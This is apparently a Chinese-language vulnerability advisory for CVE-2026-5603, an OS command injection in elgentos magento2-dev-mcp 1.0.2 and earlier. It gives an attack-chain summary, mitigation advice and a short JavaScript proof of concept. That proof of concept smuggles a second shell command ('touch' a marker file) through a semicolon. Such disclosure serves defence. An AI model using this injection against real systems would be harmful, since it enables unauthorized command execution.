CVE-2026-5603 CVSS 5.3 中危

CVE-2026-5603 elgentos magento2-dev-mcp OS命令注入漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5603

漏洞类型

OS命令注入

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

elgentos magento2-dev-mcp

漏洞概述

elgentos magento2-dev-mcp 在 1.0.2 及之前的版本中存在操作系统命令注入漏洞。该漏洞位于 src/index.ts 文件的 executeMagerun2Command 函数中，由于未能正确处理用户输入，攻击者可以通过本地访问操纵该函数并注入恶意操作系统命令。攻击需要本地访问权限和低权限账户，且无需用户交互。目前该漏洞的利用代码已公开，建议用户尽快应用补丁以修复此问题。

技术细节

该漏洞源于 elgentos magento2-dev-mcp 组件中 src/index.ts 文件的 executeMagerun2Command 函数。该函数旨在封装对 n98-magerun2 命令的调用，但在实现过程中，直接将用户可控的输入拼接到了系统命令字符串中，未进行严格的输入清洗或转义。攻击者若拥有本地系统的低权限账户（PR:L），即可构造包含特殊字符（如分号、管道符）的恶意参数传递给该函数。当系统执行该命令时，拼接的恶意载荷将被操作系统 Shell 解析并执行，从而导致命令注入。此漏洞可能泄露系统信息（C:L）、篡改数据（I:L）或影响服务可用性（A:L）。官方补丁 aa1ffcc0aea1b212c69787391783af27df15ae9d 已对该问题进行了修复。

攻击链分析

STEP 1

步骤1：本地访问

攻击者获得目标系统的本地访问权限，并拥有低级别用户账户。

STEP 2

步骤2：识别漏洞

确认系统安装了 elgentos magento2-dev-mcp 1.0.2 或更早版本。

STEP 3

步骤3：构造载荷

攻击者设计包含 Shell 元字符（如 ; 或 |）的恶意字符串，旨在绕过原有命令逻辑并注入新命令。

STEP 4

步骤4：执行注入

攻击者调用 executeMagerun2Command 函数并传入恶意载荷，触发操作系统命令注入。

STEP 5

步骤5：达成目标

恶意命令以当前用户权限执行，可能导致文件读写、数据窃取或系统破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC demonstration for CVE-2026-5603
// This assumes the vulnerable function is invoked with unsanitized input

const { executeMagerun2Command } = require('./src/index');

// Malicious payload to inject a command (e.g., create a file)
// Using ';' to chain commands in a Unix-like shell
const payload = "version; touch /tmp/CVE-2026-5603_PWNED; #";

console.log("Sending payload to vulnerable function...");

try {
    // Trigger the vulnerability
    executeMagerun2Command(payload);
    console.log("Payload sent. Check /tmp/CVE-2026-5603_PWNED to verify exploitation.");
} catch (error) {
    console.error("Exploit failed:", error);
}

影响范围

elgentos magento2-dev-mcp <= 1.0.2

防御指南

临时缓解措施

在未升级修复前，应严格限制对 magento2-dev-mcp 工具的本地访问权限，确保仅有管理员或受信用户能够执行相关命令。同时，应监控系统中是否存在异常的进程调用或文件创建行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表